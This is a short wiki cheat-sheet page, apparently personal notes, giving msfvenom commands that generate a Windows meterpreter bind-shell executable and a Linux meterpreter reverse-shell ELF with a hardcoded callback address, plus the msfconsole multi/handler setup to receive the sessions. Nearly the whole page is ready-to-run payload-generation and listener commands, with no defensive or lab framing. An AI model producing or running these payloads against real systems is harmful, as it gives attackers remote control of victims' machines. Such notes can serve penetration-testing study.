User Tools

Site Tools


cyberdocs:msfvenom_generate_linux-windows_payloads

for windows

  msfvenom -p windows/meterpreter/bind_tcp LPORT=4477 -f exe -o BIND_TCP.exe 
  msfconsole
  > use exploit/multi/handler 
  msf exploit(handler) > set payload windows/meterpreter/bind_tcp
  set lport 4477
  set rhost 172.16.60.76

for linux

  msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=172.16.60.68 LPORT=5560 -e elf -o reverse_tcp.elf
  msfconsole
  > use exploit/multi/handler 
  msf exploit(handler) > set payload linux/x86/meterpreter/reverse_tcp
  > set lhost 172.16.60.68
  > set lport 5560
  chmod  a+x reverse_tcp.elf
  
  hendler = pret ose servon
cyberdocs/msfvenom_generate_linux-windows_payloads.txt · Last modified: 2019/02/06 09:02 by cyber

Donate Powered by PHP Valid HTML5 Valid CSS Driven by DokuWiki